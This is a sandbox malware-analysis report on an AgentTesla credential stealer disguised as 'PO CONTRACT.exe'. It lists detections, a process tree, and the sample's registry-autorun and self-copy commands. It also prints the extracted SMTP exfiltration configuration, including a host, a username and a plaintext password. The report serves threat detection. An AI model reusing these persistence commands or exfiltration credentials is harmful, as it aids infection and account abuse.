Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO CONTRACT.exe

Overview

General Information

Sample name:PO CONTRACT.exe
Analysis ID:1493192
MD5:e9e7439b7d1098424bfc0bc877b7b2c2
SHA1:5e0660202b12db946ae396fd8252111d5eaaea73
SHA256:7787902137178990efe8cb5974196101405cab9c70332fbbd45f546fd4fcb04c
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains very large array initializations
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PO CONTRACT.exe (PID: 4388 cmdline: "C:\Users\user\Desktop\PO CONTRACT.exe" MD5: E9E7439B7D1098424BFC0BC877B7B2C2)
    • cmd.exe (PID: 1348 cmdline: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 2836 cmdline: ping 127.0.0.1 -n 36 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • reg.exe (PID: 5436 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 1496 cmdline: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 1276 cmdline: ping 127.0.0.1 -n 43 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 7768 cmdline: ping 127.0.0.1 -n 43 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • SOA.exe (PID: 7300 cmdline: "C:\Windows\SysWOW64\SOA.exe" MD5: E9E7439B7D1098424BFC0BC877B7B2C2)
        • InstallUtil.exe (PID: 6732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • GUIVTme.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • GUIVTme.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO CONTRACT.exe.4044ef2.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.PO CONTRACT.exe.4044ef2.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.PO CONTRACT.exe.4044ef2.2.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  0.2.PO CONTRACT.exe.4044ef2.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x31d64:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31dd6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31e60:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31ef2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31f5c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31fce:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32064:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x320f4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  10.2.SOA.exe.401c15a.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 63 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\SOA.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SOA
                    Sigma detected: Direct Autorun Keys Modification
                    Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1348, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", ProcessId: 5436, ProcessName: reg.exe
                    Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\PO CONTRACT.exe", ParentImage: C:\Users\user\Desktop\PO CONTRACT.exe, ParentProcessId: 4388, ParentProcessName: PO CONTRACT.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe", ProcessId: 1348, ProcessName: cmd.exe
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\PO CONTRACT.exe", ParentImage: C:\Users\user\Desktop\PO CONTRACT.exe, ParentProcessId: 4388, ParentProcessName: PO CONTRACT.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe", ProcessId: 1496, ProcessName: cmd.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 10.2.SOA.exe.3fa5dca.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.unitechautomations.com", "Username": "design@unitechautomations.com", "Password": "Unitech@123"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Windows\SysWOW64\SOA.exeReversingLabs: Detection: 47%
                    Source: C:\Windows\SysWOW64\SOA.exeVirustotal: Detection: 57%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: PO CONTRACT.exeVirustotal: Detection: 34%Perma Link
                    Source: PO CONTRACT.exeReversingLabs: Detection: 47%
                    Machine Learning detection for dropped file
                    Source: C:\Windows\SysWOW64\SOA.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: PO CONTRACT.exeJoe Sandbox ML: detected
                    Source: PO CONTRACT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: PO CONTRACT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
                    Source: Binary string: indows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: lBasic.pdb source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: InstallUtil.pdb source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb## source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: til.pdb source: InstallUtil.exe, 0000000B.00000002.40726882971.0000000006479000.00000004.00000020.00020000.00000000.sdmp

                    Networking

                    barindex
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36
                    Source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                    Source: PO CONTRACT.exe, 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR
                    Source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR
                    Source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR
                    Source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR
                    Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, cPKWk.cs.Net Code: MPvOvSMQSR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: PO CONTRACT.exe, Lg3n7.csLarge array initialization: Lg3n7: array initializer size 2053
                    Source: SOA.exe.5.dr, Lg3n7.csLarge array initialization: Lg3n7: array initializer size 2053
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A759CB0 CreateProcessAsUserW,10_2_0A759CB0
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\SOA.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\SOA.exe:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_02D644200_2_02D64420
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_02D6C8D80_2_02D6C8D8
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_02D637E00_2_02D637E0
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_02D613000_2_02D61300
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_05453EA00_2_05453EA0
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F50AB80_2_08F50AB8
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F500400_2_08F50040
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF40660_2_08FF4066
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF94C00_2_08FF94C0
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF2A8D0_2_08FF2A8D
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF2B000_2_08FF2B00
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_097209D80_2_097209D8
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_097280580_2_09728058
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_0972BD580_2_0972BD58
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_0972BD470_2_0972BD47
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F50A940_2_08F50A94
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_013F442010_2_013F4420
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_013FC8C910_2_013FC8C9
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_013F37E010_2_013F37E0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_013F130010_2_013F1300
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C9D4810_2_056C9D48
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CBD5010_2_056CBD50
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CA48010_2_056CA480
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CAE5010_2_056CAE50
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C814810_2_056C8148
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C9D1710_2_056C9D17
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CA47010_2_056CA470
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CBC5810_2_056CBC58
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CE4C810_2_056CE4C8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CE4B810_2_056CE4B8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CD7E010_2_056CD7E0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CD7F010_2_056CD7F0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CDE6010_2_056CDE60
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CAE4010_2_056CAE40
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CDE5010_2_056CDE50
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C813910_2_056C8139
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C910810_2_056C9108
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C911810_2_056C9118
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CE08810_2_056CE088
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CE09810_2_056CE098
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CCBE810_2_056CCBE8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CCBF810_2_056CCBF8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CDAE010_2_056CDAE0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056CDAF010_2_056CDAF0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_09170AB810_2_09170AB8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0917E91510_2_0917E915
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0917E95010_2_0917E950
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0917000610_2_09170006
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0917004010_2_09170040
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75A24810_2_0A75A248
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A754AA810_2_0A754AA8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75428010_2_0A754280
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75404810_2_0A754048
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A7528E010_2_0A7528E0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75427010_2_0A754270
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75321010_2_0A753210
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A754A9910_2_0A754A99
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A752B7010_2_0A752B70
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75AB3010_2_0A75AB30
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A752B8010_2_0A752B80
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75387810_2_0A753878
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75004010_2_0A750040
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75403810_2_0A754038
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A75003A10_2_0A75003A
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A7568E810_2_0A7568E8
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A7528D110_2_0A7528D1
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0A7585E010_2_0A7585E0
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_09170A9410_2_09170A94
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F9D26011_2_02F9D260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F9A0A011_2_02F9A0A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F94AD011_2_02F94AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F9981811_2_02F99818
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F93EB811_2_02F93EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F9420011_2_02F94200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F9A09211_2_02F9A092
                    Source: PO CONTRACT.exe, 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs PO CONTRACT.exe
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs PO CONTRACT.exe
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHPzFG9.dll" vs PO CONTRACT.exe
                    Source: PO CONTRACT.exe, 00000000.00000002.35998232560.00000000011EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO CONTRACT.exe
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs PO CONTRACT.exe
